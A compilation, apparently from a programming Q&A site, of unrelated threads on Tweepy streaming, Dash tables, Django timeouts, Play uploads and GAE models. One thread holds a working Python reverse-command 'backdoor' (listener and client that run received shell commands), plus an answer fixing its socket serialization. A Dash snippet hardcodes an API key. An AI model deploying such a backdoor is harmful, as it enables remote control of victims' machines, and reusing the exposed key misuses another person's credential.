Creating a dataset

I am trying to extract tweets for a specific hashtag and save them in a CSV file. The code below works well, but I would like to split the data. How can I split it?
Any advice will be highly appreciated,
Niddal
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
import time
import json
import codecs
import sys
ckey = ''
csecret = ''
atoken = ''
asecret = ''
non_bmp_map = dict.fromkeys(range(0x10000, sys.maxunicode + 1), 0xfffd)
class StdOutListener(StreamListener):
    def on_data(self, data):
        try:
            tweet = json.loads(data)['text']
            #tweet = data.split(',"text":"')[1].split('","source')[0]
            print(tweet.translate(non_bmp_map))
            saveThis = str(time.time()) + '::' + tweet
            SaveFile = codecs.open('d:\\StremHash.csv', 'a', "utf-8")
            SaveFile.write(saveThis)
            SaveFile.write('\n')
            SaveFile.close()
            return True
        except BaseException, e:
            print('failed on data,', str(e))
            time.sleep(5)

    def on_error(self, status):
        print(status)


if __name__ == '__main__':
    l = StdOutListener()
    auth = OAuthHandler(ckey, csecret)
    auth.set_access_token(atoken, asecret)
    twitterStream = Stream(auth, l)
    twitterStream.filter(track=[unicode("#عيدكم_مبارك", "utf-8")])
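One way to split each saved record into separate columns (a minimal sketch, assuming the goal is a timestamp column and a text column in the CSV) is to let the csv module write the row instead of joining the values with '::'; on_data could then look something like this:
import csv
import json
import time

def on_data(self, data):
    tweet = json.loads(data)['text']
    # append one row per tweet, with the timestamp and the text as separate columns
    with open('d:\\StremHash.csv', 'ab') as f:  # binary mode for Python 2's csv module
        writer = csv.writer(f)
        writer.writerow([str(time.time()), tweet.encode('utf-8')])
    return True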


Socket Serialization Error, a bytes-like object is required, not 'str'

I tried encoding, but it is not working. Can anyone help me with the serialization in Python 3? I keep getting: a bytes-like object is required, not 'str'.
#!/usr/bin/python3
import socket
import json
import pickle
class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for Incoming Connection")
        self.connection, address = listener.accept()
        print("[+] Got a Connection from " + str(address))

    def serialize_send(self, data):
        data_send = json.dumps(data)
        return self.connection.send(data_send)

    def serialize_receive(self):
        json_dataX = ""
        while True:
            try:
                # json_data = json_data + self.connection.recv(1024)
                # data = self.connection.recv(1024).decode("utf-8", errors="ignore")
                # json_data = json_data + data
                # return json.loads(json_data)
                json_data = bytes(json_dataX, 'utf-8') + self.connection.recv(1024)
                return json.loads(json.loads(json_data.decode('utf8')))
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.serialize_send(command)
        if command[0] == "exit":
            self.connection.close()
            exit()
        return self.serialize_receive()

    def run(self):
        while True:
            comX = input(">> : ")
            command = comX.split(" ")
            try:
                sys_command = str(command[0])
                result = self.execute_remotely(sys_command)
            except Exception as errorX:
                result = errorX
            print(result)


my_backdoor = Listener("localhost", 1234)
my_backdoor.run()
Client Code
#!/usr/bin/python3
import socket
import subprocess
import json
import pickle
class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect(("localhost", 1234))

    def serialize_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def serialize_receive(self):
        json_dataX = ""
        while True:
            try:
                # conn_Recv = self.connection.recv(1024)
                # data = self.connection.recv(1024).decode("utf-8", errors="ignore")
                # json_data = json_dataX + data
                json_data = bytes(json_dataX, 'utf-8') + self.connection.recv(1024)
                return json.loads(json.loads(json_data.decode('utf8')))
            except ValueError:
                continue

    def execute_system_commmand(self, command):
        return subprocess.check_output(command, shell=True)

    def run(self):
        while True:
            commandx = self.serialize_receive()
            command = commandx
            try:
                if command[0] == "exit":
                    self.connection.close()
                    exit()
                else:
                    command_result = self.execute_system_commmand(command)
            except Exception:
                command_result = "[-] Unknown Execution."
            self.serialize_send(command_result)


my_backdoor = Backdoor("localhost", 1234)
my_backdoor.run()
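The root of the error is that in Python 3 socket.send()/recv() work with bytes while json.dumps()/json.loads() work with str, so the sender has to encode and the receiver has to decode. A minimal sketch of the two helpers written that way (the newline-delimited framing is my own assumption, not part of the original protocol):
import json

def serialize_send(connection, data):
    # json.dumps returns str; encode it to bytes before sending
    payload = json.dumps(data).encode("utf-8") + b"\n"  # newline marks end of message
    connection.sendall(payload)

def serialize_receive(connection):
    # accumulate bytes until a complete newline-terminated JSON message has arrived
    buffer = b""
    while not buffer.endswith(b"\n"):
        chunk = connection.recv(1024)
        if not chunk:
            raise ConnectionError("socket closed before a full message arrived")
        buffer += chunk
    return json.loads(buffer.decode("utf-8"))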

Display dash datatable through callback

I want to be able to return a populated Dash table based on the results of an input search. I've tried two methods so far: returning the entire DataTable in the callback output, and returning the columns and data separately in the callback. Neither option has been working for me. I've included the relevant code for each option and the error message that results from each:
Return the data and columns separately:
@app.callback(
    [Output('table', 'data'),
     Output('table', 'columns')],
    [Input("button", "n_clicks")], state=[State('url', 'value')])
def update_table(n_click: int, url):
    if n_click > 1:
        summary, table = summarizer(url)
        columns = [{"name": i, "id": i, "deletable": True, "selectable": True} for i in table.columns]
        table = table.to_dict('records')
        return table, columns
    else:
        return [], []
The app.layout contains the following line
html.Div(dt.DataTable(id='table'))
The error message that results from this is:
Objects are not valid as a React child
The second approach was to pass the entire DataTable through the callback and display it using just the html.Div in the layout, like this:
@app.callback(
    Output('table', 'children'),
    [Input("button", "n_clicks")], state=[State('url', 'value')])
def update_table(n_click: int, url):
    if n_click > 1:
        summary, table = summarizer(url)
        columns = [{"name": i, "id": i, "deletable": True, "selectable": True} for i in table.columns]
        table = table.to_dict('records')
        return dt.DataTable(data=table, columns=columns)
    else:
        return []
html.Div(id='table')
The corresponding error was:
Objects are not valid as a React child
This error is confusing to me since it seems to be about the column definition; however, I can't pass in an array, and the documentation asks for a dictionary.
Full code sample:
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
import dash_table as dt
from dash.dependencies import Input, Output, State
import sd_material_ui
from newspaper import Article
import gensim
from gensim.summarization import summarize
from dash.exceptions import PreventUpdate
from newspaper import fulltext
import requests
import pandas as pd
import yake
import nltk
from newsapi import NewsApiClient
leftSources = ["cnn", "buzzfeed", "the-washington-post", "bbc-news", "vice-news", "newsweek", "techcrunch", "reuters", "politico", "newsweek", "msnbc"]
rightSources = ["fox-news", "national-review", "new-york-magazine", "breitbart-news", "business-insider", "the-wall-street-journal", "bloomberg", "the-washington-times", "the-hill", "the-american-conservative"]
# importing CSS
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
# similarArticleURL
getSimilarArticlesURL = "https://us-central1-secure-site-266302.cloudfunctions.net/getSimilarArticles?keywords="
getKeywordsURL = "https://us-central1-secure-site-266302.cloudfunctions.net/getKeyword?text="
getArticleTextURL = "https://us-central1-secure-site-266302.cloudfunctions.net/getArticleText?url="
allData = pd.DataFrame()
# instantiating dash application
app = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])
server = app.server # the flask app
# helper functions
def generate_table(dataframe, max_rows=10):
    return html.Table([
        html.Thead(
            html.Tr([html.Th(col) for col in dataframe.columns])
        ),
        html.Tbody([
            html.Tr([
                html.Td(dataframe.iloc[i][col]) for col in dataframe.columns
            ]) for i in range(min(len(dataframe), max_rows))
        ])
    ])
app.layout = html.Div([
    html.Div(html.H3("Brief.Me"), style={'font-weight': 'bold', 'background-color': 'darkorange', 'color': 'white', 'text-align': 'center'}),
    html.Br(),
    html.Br(),
    dbc.Row([
        dbc.Col(dbc.Input(id='url', type='url', size=30, placeholder="Type or copy/paste an URL"), width={'size': 6, 'order': 1, 'offset': 3}),
        dbc.Col(dbc.Button("Summarize", id='button', n_clicks=1, color="primary", className="mr-1"), width={'order': 2})
    ]),
    html.Br(),
    # dbc.Row([
    #     dbc.Col(dcc.Loading(html.Div(html.Div(id="summary"), style={'font-weight':'bold'})), width={'size':6, 'offset':3})
    # ]),
    html.Div(id='table')
],
)
def fetch_similar_articles(keyword):
    tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
    newsapi = NewsApiClient(api_key='ce7482cbd40f4d90a8eea404e7702db6')
    top_headlines = newsapi.get_top_headlines(q=keyword,
                                              sources='bbc-news,the-wall-street-journal,the-washington-post,fox-news,bloomberg, vice-news, politico, reuters, the-hill',
                                              language='en')
    return top_headlines["articles"]

def fetch_article_text(url):
    try:
        article = Article(url)
        article.download()
        article.parse()
        return article.text
    except:
        return None
def summarizer(url):
    global allData
    leftSummaries, rightSummaries = {}, {}
    text = fetch_article_text(url)
    main_summary = summarize(text)
    keywords = extract_keywords(text)
    urls = []
    rightData, leftData, allData = get_articles_content(keywords)
    rightDf, leftDf = pd.DataFrame(rightData), pd.DataFrame(leftData)
    allSources = pd.concat([rightDf, leftDf], axis=1)
    return main_summary, allData
def get_articles_content(keywords):
    '''
    This function will return a row of the dataframe where there is a title, source, url and summary.
    '''
    allResults, leftRows, rightRows = [], [], []
    for keyword in keywords:
        articleList = fetch_similar_articles(keyword)
        for elem in articleList:
            source = elem['source']
            url = elem['url']
            title = elem['title']
            text = fetch_article_text(url)
            if text is not None and len(text) > 1:
                summary = summarize(text)
                allResults.append({'title': title, 'url': url, 'source': source, 'summary': summary})
                if source in leftSources:
                    leftRows.append(pd.DataFrame({'title': title, 'url': url, 'source': source, 'summary': summary}))
                elif source in rightSources:
                    rightRows.append(pd.DataFrame({'title': title, 'url': url, 'source': source, 'summary': summary}))
    allResults = pd.DataFrame(allResults)
    return leftRows, rightRows, allResults
def extract_keywords_yake(text, phrase_length, num_keywords):
    custom_kw_extractor = yake.KeywordExtractor(n=phrase_length, top=num_keywords)
    keywords = custom_kw_extractor.extract_keywords(text)
    return keywords

def extract_keywords(text):
    '''
    Returns a list of keywords given the article text.
    '''
    global getKeywordsURL
    getKeywordsURL += text
    keywordRes = extract_keywords_yake(text, 2, 5)
    keywords = []
    for pair in keywordRes:
        keywords.append(pair[1])
    return keywords
@app.callback(  # Output('summary', 'children')
    Output('table', 'children'),
    [Input("button", "n_clicks")], state=[State('url', 'value')])
def update_table(n_click: int, url):
    if n_click > 1:
        summary, table = summarizer(url)
        columns = [{"name": i, "id": i, "deletable": True, "selectable": True} for i in table.columns]
        table = table.to_dict('records')
        return dt.DataTable(data=table, columns=columns)
    else:
        return [], []

if __name__ == '__main__':
    app.run_server(debug=True, host='0.0.0.0', port=8080)
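For comparison, here is a stripped-down sketch of the second approach in isolation, a hedged example rather than a drop-in fix: it keeps the dash 1.x-style packages imported above, swaps the bootstrap components for plain dcc/html ones, and replaces summarizer() with a hard-coded DataFrame so it can run on its own.
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_table as dt
import pandas as pd
from dash.dependencies import Input, Output, State

app = dash.Dash(__name__)
app.layout = html.Div([
    dcc.Input(id='url', type='url', placeholder="Type or copy/paste an URL"),
    html.Button("Summarize", id='button', n_clicks=0),
    html.Div(id='table'),  # empty container that the callback fills
])

@app.callback(Output('table', 'children'),
              [Input('button', 'n_clicks')],
              [State('url', 'value')])
def update_table(n_clicks, url):
    if not n_clicks:
        return []
    # a hard-coded frame stands in for summarizer(url) here
    df = pd.DataFrame({'title': ['a', 'b'], 'summary': ['...', '...']})
    columns = [{"name": c, "id": c} for c in df.columns]
    return dt.DataTable(data=df.to_dict('records'), columns=columns)

if __name__ == '__main__':
    app.run_server(debug=True)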

How to increase the timeout on cookiecutter-django

I'm processing some data from the redis cache. But it seems like I cannot process it fast enough to fit within the request timeout. Is there a way to increase the timeout in nginx or django? (I'm not even sure if cookiecutter-django has nginx).
# views.py
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.pagination import PageNumberPagination
class SmallResultsSetPagination(PageNumberPagination):
    page_size = 5
    page_size_query_param = "page_size"

class FooViewSet(viewsets.ModelViewSet):
    queryset = Foo.objects.all().order_by("id")
    serializer_class = FooSerializer
    pagination_class = SmallResultsSetPagination
    filterset_fields = ["bar"]
# serializers.py
from rest_framework import serializers
from .models import Foo
class FooSerializer(serializers.ModelSerializer):
    id = serializers.IntegerField(read_only=True)
    DT_RowId = serializers.SerializerMethodField()

    def get_DT_RowId(self, obj):
        return obj.id

    class Meta:
        model = Foo
        fields = (
            "id",
            "DT_RowId",
            "name",
            "baz",
            "api_data",
        )
        datatables_always_serialize = ("baz", "api_data")
# models.py
import logging
import xml.etree.ElementTree as ElementTree
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.cache import cache
from django.db import models
from django.utils.functional import cached_property
import requests
from requests.exceptions import ConnectionError, Timeout
logger = logging.getLogger(__name__)
def third_party_api():
    bars = cache.get("bars")
    if bars:
        print("cache hit")
        return bars

    def bars_to_dict(root):
        bars = {}
        for bar in root[1]:
            bar_name = bar.tag
            entry = {}
            for pair in bar:
                tag = pair.tag.split("}")[-1]
                value = pair.text
                entry[tag] = value
            key = entry["buzz"].strip().lower()
            bars[key] = entry
        return bars

    try:
        r = requests.get(
            f"{API}", timeout=5,
        )
        root = ElementTree.fromstring(r.text)
        bars = bars_to_dict(root)
        cache.set("bars", bars, 60 * 5)
        return bars
    except (ConnectionError, Timeout) as e:
        if settings.DEBUG:
            tree = ElementTree.parse("scripts/bars.xml")
            root = tree.getroot()
            bars = bars_to_dict(root)
            cache.set("bars", bars, 60 * 5)
            return bars
        else:
            return {}


class Foo(models.Model):
    baz = models.BooleanField(default=False)

    @cached_property
    def api_data(foo):
        bars = third_party_api()
        match = bars.get(foo.id)
        if match:
            field = match.get("biz", False)
            return field == "true"
        else:
            return False
When I hit the browsable API on staging, https://host.com/api/foos/?page_size=7, I get Bad Gateway for page_size values > 7. I'm pretty sure I'm doing too much computation for the default timeout.
The setting is inside settings/base.py
https://github.com/pydanny/cookiecutter-django/blob/8d5542d6754b520e0698286d8a0e6b6fc1257715/%7B%7Bcookiecutter.project_slug%7D%7D/config/settings/base.py#L289
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-time-limit
CELERY_TASK_TIME_LIMIT = 5 * 60
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-soft-time-limit
CELERY_TASK_SOFT_TIME_LIMIT = 60
The units are in seconds.
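Note that those Celery settings only limit background task runtime, not the HTTP request that is timing out here. A hedged sketch of one place the request timeout could be raised instead, assuming the production stack serves Django through gunicorn (as cookiecutter-django's production Docker setup typically does); gunicorn reads a Python config file, so a hypothetical gunicorn.conf.py could look like this:
# gunicorn.conf.py -- hypothetical file; cookiecutter-django usually passes the
# equivalent flags (e.g. --timeout) in compose/production/django/start instead.
# The default worker timeout is 30s; a worker still busy after that is killed,
# which the proxy in front reports as 502 Bad Gateway.
bind = "0.0.0.0:5000"
workers = 2
timeout = 120  # seconds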

Uploading file from Angular ng-file-upload to Play for Scala

I'm trying to upload a .csv file using ng-file-upload in the browser and Play for Scala 2.5.x at the backend.
If I use moveTo in Play, the file is uploaded, but it is saved with the multipart headers and trailers instead of the plain file:
request.body.moveTo(new File("c:\\tmp\\uploaded\\filetest.csv"))
Is there a way to save only the data part?
Alternatively, I tried the following
def doUpload = Action(parse.multipartFormData) { request =>
  println(request.contentType.get)
  println(request.body)
  request.body.file("file").map { file =>
    val filename = file.filename
    val contentType = file.contentType
    file.ref.moveTo(new File("c:\\tmp\\uploaded\\filetest.csv"))
  }
  Ok("file uploaded at " + new java.util.Date())
}
But the map is empty. This is what I get in the first two println statements:
multipart/form-data
MultipartFormData(Map(),Vector(FilePart(file,hello2.csv,Some(application/vnd.ms-excel),TemporaryFile(C:\Users\BUSINE~1\AppData\Local\Temp\playtemp2236977636541678879\multipartBody2268668511935303172asTemporaryFile))),Vector())
Meaning that I am receiving something, however I cannot extract it. Any ideas?
A bit verbose maybe but it does what you want.
Note that I am on a Mac so you may have to change the /tmp/uploaded/ path in copyFile since it looks like you are on Windows.
package controllers
import java.io.File
import java.nio.file.attribute.PosixFilePermission._
import java.nio.file.attribute.PosixFilePermissions
import java.nio.file.{Files, Path}
import java.util
import javax.inject._
import akka.stream.IOResult
import akka.stream.scaladsl._
import akka.util.ByteString
import play.api._
import play.api.data.Form
import play.api.data.Forms._
import play.api.i18n.MessagesApi
import play.api.libs.streams._
import play.api.mvc.MultipartFormData.FilePart
import play.api.mvc._
import play.core.parsers.Multipart.FileInfo
import scala.concurrent.Future
import java.nio.file.StandardCopyOption._
import java.nio.file.Paths
case class FormData(filename: String)

// Type for multipart body parser
type FilePartHandler[A] = FileInfo => Accumulator[ByteString, FilePart[A]]

val form = Form(mapping("file" -> text)(FormData.apply)(FormData.unapply))

private def deleteTempFile(file: File) = Files.deleteIfExists(file.toPath)

// Copies temp file to your loc with provided name
private def copyFile(file: File, name: String) =
  Files.copy(file.toPath(), Paths.get("/tmp/uploaded/", "copy_" + name), REPLACE_EXISTING)

// FilePartHandler which returns a File, rather than Play's TemporaryFile class
private def handleFilePartAsFile: FilePartHandler[File] = {
  case FileInfo(partName, filename, contentType) =>
    val attr = PosixFilePermissions.asFileAttribute(util.EnumSet.of(OWNER_READ, OWNER_WRITE))
    val path: Path = Files.createTempFile("multipartBody", "tempFile", attr)
    val file = path.toFile
    val fileSink: Sink[ByteString, Future[IOResult]] = FileIO.toPath(file.toPath())
    val accumulator: Accumulator[ByteString, IOResult] = Accumulator(fileSink)
    accumulator.map {
      case IOResult(count, status) =>
        FilePart(partName, filename, contentType, file)
    }(play.api.libs.concurrent.Execution.defaultContext)
}

// The action
def doUpload = Action(parse.multipartFormData(handleFilePartAsFile)) { implicit request =>
  val fileOption = request.body.file("file").map {
    case FilePart(key, filename, contentType, file) =>
      val copy = copyFile(file, filename)
      val deleted = deleteTempFile(file) // delete original uploaded file after we have the copy
      copy
  }
  Ok(s"Uploaded: ${fileOption}")
}

Adding methods to GAE database class

I am messing around with GAE. I want to place my database object in one file and call it from another. Here is the DB object:
import webapp2
import os
import jinja2
import json
import logging
import main
from google.appengine.ext import db
class User(db.Model):
    user_name = db.StringProperty(required=True)
    hashed_password = db.StringProperty(required=True)
    email = db.EmailProperty(required=True)
    created_dttm = db.DateTimeProperty(auto_now_add=True)
    last_modified = db.DateTimeProperty(auto_now=True)
    coords = db.GeoPtProperty(required=False)

    # def as_dict(self):
    #     time_fmt = '%c'
    #     d = {
    #         'subject': self.subject,
    #         'content': self.content,
    #         'created': self.created_dttm.strftime(time_fmt),
    #         'last_modified': self.last_modified.strftime(time_fmt)
    #     }
    #     return d

    def isValueUnique(self, column, value):
        result = None
        q = User.all()
        q.filter(column, value)
        result = q.get()
        return result
I cannot instantiate the DB because it thinks I'm trying to store data.
I want to call the isValueUnique method from another file like so:
import webapp2
import os
import jinja2
import json
import logging
import main
import database
import validation
from google.appengine.ext import db
class SignUp(main.Handler):
    def post(self):
        user_username = self.request.get("username")
        user_email = self.request.get("email")
        user_pass = self.request.get("password")
        user_verify = self.request.get("verify")
        valid = validation.Valid()
        error1 = ""
        error2 = ""
        error3 = ""
        error4 = ""
        q = database.User.all()
        q.filter("username =", user_username)
        result = q.get()
        if result:
            error1 = "Username already taken"
        if (not valid.valid_user(user_username)) and (not error1):
            error1 = "Enter a valid username"
        if not valid.valid_password(user_pass):
            error2 = "Enter a valid password"
        if not valid.valid_pass_match(user_pass, user_verify):
            error3 = "Passwords must match"
        # Email Validation
        email = valid.valid_email(user_email)
        if not email:
            error4 = "Invalid email"
            email = ""
        elif not database.User.isValueUnique("email", email):
            error4 = "Email already in use, please sign in"
            email = ""
I get this error:
elif not database.User.isValueUnique("email",email):
TypeError: unbound method isValueUnique() must be called with User instance as first argument (got str instance instead)
I can't instantiate User like I already said. What is the work around here?
database.User.isValueUnique("email",email)
This is attempting to call a method on the database.User class, but isValueUnique is an instance method.
If you decorate isValueUnique with @staticmethod you'll get farther.
Where are you trying to instantiate a User?
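For illustration, here is a sketch of one way to rework it; using @classmethod instead of @staticmethod is my own choice (the query still needs the User class), and the "email =" filter string simply follows the same property/operator format the SignUp handler already uses:
from google.appengine.ext import db

class User(db.Model):
    # ... properties as above ...

    @classmethod
    def isValueUnique(cls, column, value):
        # look for an existing User entity whose `column` equals `value`
        q = cls.all()
        q.filter(column, value)
        return q.get()

# called from the other file without creating a User instance:
# database.User.isValueUnique("email =", email)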
